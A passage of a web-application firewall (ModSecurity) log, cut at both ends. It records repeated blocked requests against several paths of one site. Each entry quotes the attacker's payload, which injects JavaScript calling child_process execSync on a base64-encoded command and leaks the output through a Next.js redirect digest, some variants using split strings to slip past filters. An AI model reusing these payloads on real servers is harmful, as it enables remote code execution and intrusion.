"/en/"] [unique_id "aX7Cai0X30NspmATJTwY8gAAANA"] [Sun Feb 01 05:03:06.626503 2026] [:error] [pid 16364:tid 16369] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _sjcb=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _yawc=Buffer.from(_sjcb).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_yawc};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX7Cai0X30NspmATJTwY8wAAAMM"] [Sun Feb 01 05:03:06.653370 2026] [:error] [pid 16364:tid 16374] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _winh=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zder=Buffer.from(_winh).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zder};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX7Cai0X30NspmATJTwY9AAAAMg"] [Sun Feb 01 05:03:06.681938 2026] [:error] [pid 16364:tid 16385] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _hgdo=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jaxj=Buffer.from(_hgdo).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jaxj};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX7Cai0X30NspmATJTwY9QAAANM"] [Sun Feb 01 05:03:06.710876 2026] [:error] [pid 16364:tid 16390] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ucgk=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _moqt=Buffer.from(_ucgk).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_moqt};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7Cai0X30NspmATJTwY9gAAANg"] [Sun Feb 01 05:03:06.740270 2026] [:error] [pid 16364:tid 16373] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vzwq=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _jyvz=Buffer.from(_vzwq).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jyvz};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7Cai0X30NspmATJTwY9wAAAMc"] [Sun Feb 01 05:03:06.769108 2026] [:error] [pid 16364:tid 16378] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _haqw=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _hyyy=Buffer.from(_haqw).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hyyy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX7Cai0X30NspmATJTwY-AAAAMw"] [Sun Feb 01 05:03:06.795791 2026] [:error] [pid 16364:tid 16379] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qkrh=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _uuzu=Buffer.from(_qkrh).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_uuzu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX7Cai0X30NspmATJTwY-QAAAM0"] [Sun Feb 01 05:03:06.824092 2026] [:error] [pid 16364:tid 16387] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _mbkn=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _yegj=Buffer.from(_mbkn).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_yegj};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX7Cai0X30NspmATJTwY-gAAANU"] [Sun Feb 01 05:03:06.852685 2026] [:error] [pid 16364:tid 16381] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _nwtj=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _udst=Buffer.from(_nwtj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_udst};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX7Cai0X30NspmATJTwY_AAAAM8"] [Sun Feb 01 05:03:06.879953 2026] [:error] [pid 16364:tid 16388] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _rfsi=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _opur=Buffer.from(_rfsi).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_opur};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7Cai0X30NspmATJTwY_QAAANY"] [Sun Feb 01 05:03:06.906667 2026] [:error] [pid 16364:tid 16389] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _tlzb=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _mvcn=Buffer.from(_tlzb).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_mvcn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7Cai0X30NspmATJTwY_gAAANc"] [Sun Feb 01 05:03:06.935366 2026] [:error] [pid 16364:tid 16380] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _yeii=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zhkw=Buffer.from(_yeii).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zhkw};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX7Cai0X30NspmATJTwZAAAAAM4"] [Sun Feb 01 05:03:06.965554 2026] [:error] [pid 16364:tid 16371] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _tmuj=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _bedi=Buffer.from(_tmuj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bedi};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX7Cai0X30NspmATJTwZAQAAAMU"] [Sun Feb 01 05:03:06.994359 2026] [:error] [pid 16364:tid 16367] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _phdl=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xjxr=Buffer.from(_phdl).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xjxr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX7Cai0X30NspmATJTwZAgAAAME"] [Sun Feb 01 05:03:07.022962 2026] [:error] [pid 16364:tid 16384] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _cfua=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _cywx=Buffer.from(_cfua).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_cywx};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX7Cay0X30NspmATJTwZAwAAANI"] [Sun Feb 01 05:03:07.051742 2026] [:error] [pid 16364:tid 16370] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vpnr=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ggfl=Buffer.from(_vpnr).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ggfl};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7Cay0X30NspmATJTwZBAAAAMQ"] [Sun Feb 01 05:03:07.080839 2026] [:error] [pid 16364:tid 16377] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pwbv=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _oinb=Buffer.from(_pwbv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_oinb};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7Cay0X30NspmATJTwZBQAAAMs"] [Sun Feb 01 05:03:07.109641 2026] [:error] [pid 16364:tid 16375] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _wezy=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _kimf=Buffer.from(_wezy).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_kimf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX7Cay0X30NspmATJTwZBgAAAMk"] [Sun Feb 01 05:03:07.138292 2026] [:error] [pid 16364:tid 16366] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _trrx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _pptk=Buffer.from(_trrx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_pptk};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX7Cay0X30NspmATJTwZBwAAAMA"] [Sun Feb 01 05:03:07.166594 2026] [:error] [pid 16364:tid 16382] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _egnv=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jvsl=Buffer.from(_egnv).toString('base64');throw Object.assign(new 